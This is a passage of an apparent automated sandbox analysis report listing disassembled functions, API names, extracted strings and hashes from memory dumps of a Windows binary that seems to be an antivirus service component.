                                                      • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                      • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                      Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                      • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                      • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                      • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                      Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                      • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                      • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                      • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                      Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                      • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                      • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                      • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                      Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                      • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                      • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                      • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                      Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                      • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                      • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                      • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                      Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                      • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                      • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                      • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                      Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                      • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                      • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                      • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                      Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                      • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                      • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                      • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                      Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                      • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                      • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                      • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                      Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                      • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                      • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                      • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                      Function 00007FF8FF5DFD40 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                      • Instruction ID: 680689bc7f941e969c92b076af367193a65b7c31aee6f7cd4fe97a88ba4a720e
                                                      • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                      • Instruction Fuzzy Hash: 8FF06271B292A58FEBA6CF28A943A2977D1E75C3C0F94813DD6AD83B44D67C94608F04
                                                      Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                      • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                      • API String ID: 1021822269-3147033232
                                                      • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                      • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                      • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                      • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
                                                      Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                      • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                      • API String ID: 883923345-381368982
                                                      • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                      • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                      • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                      • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                      Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                      • String ID:
                                                      • API String ID: 1613947383-0
                                                      • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                      • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                      • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                      • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                      Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                      • String ID:
                                                      • API String ID: 1995290849-0
                                                      • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                      • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                      • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                      • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                      Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                      • String ID:
                                                      • API String ID: 1995290849-0
                                                      • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                      • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                      • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                      • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                      Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                      • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                      • API String ID: 93015348-1041928032
                                                      • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                      • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                      • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                      • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                      Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                      • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                      • API String ID: 3682727354-300733478
                                                      • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                      • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                      • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                      • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                      Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
